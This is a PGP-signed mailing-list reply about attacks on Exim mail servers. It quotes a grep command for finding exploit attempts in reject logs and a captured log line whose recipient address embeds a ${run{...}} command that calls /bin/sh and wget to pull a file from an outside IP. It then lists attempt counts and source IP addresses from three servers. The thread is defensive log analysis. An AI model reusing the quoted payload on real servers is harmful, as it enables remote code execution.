Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
On 21/6/19 5:52 am, Reco wrote:
> Plain old grep is more than enough here. This one:
>
> grep 'run{' /var/log/exim4/reject*
>
> finds things like these:
>
> 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> F=<support@service.com> rejected RCPT
> <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.
xxx.xxx.xxx\x22}}@localhost>:
> Unrouteable address
Okay:
21 attempts from 8 different IP addresses on one server
1 [163.172.157.143]
2 [188.138.0.205]
3 [23.129.64.152]
4 [23.129.64.193]
5 [27.69.172.214]
6 [45.55.94.254]
7 [51.15.227.108]
8 [89.248.171.57]
28 attempts on another server
1 [149.56.142.192]
2 [163.172.157.143]
3 [188.138.0.205]
4 [27.69.172.229]
5 [51.15.227.108]
6 [51.77.148.55]
7 [85.58.114.228]
8 [89.248.171.57]
17 attempts on another server
1 [188.138.0.205]
2 [89.248.171.57]
3 [98.158.184.125]
13 unique IP addresses so far.... (dig -x output)
1 149.56.142.192 192.ip-149-56-142.net.
2 163.172.157.143 143-157-172-163.rev.cloud.scaleway.com.
3 188.138.0.205 static-ip-188-138-0-205.inaddr.ip-pool.com.
4 23.129.64.152
5 23.129.64.193
6 27.69.172.214 localhost.
7 27.69.172.229 localhost.
8 45.55.94.254
9 51.15.227.108 108-227-15-51.rev.cloud.scaleway.com.
10 51.77.148.55 55.ip-51-77-148.eu.
11 85.58.114.228 228.pool85-58-114.dynamic.orange.es.
12 89.248.171.57 scanner20.openportstats.com.
13 98.158.184.125 206.217.215.125.static.midphase.com.
Cheers
A.
-----BEGIN PGP SIGNATURE-----
iHUEAREIAB0WIQTJAoMHtC6YydLfjUOoFmvLt+/i+wUCXQvuOQAKCRCoFmvLt+/i
+8/6AP4uWRBxaqjlYfqJkSPTJucCw/v011piDVxI2bgZLy1X+AD9Ev/kOtenQz+O
nrNfzeHdhOZjUP8KpGqoIRa0JQuAiJA=
=FX2s
-----END PGP SIGNATURE-----
Reply to: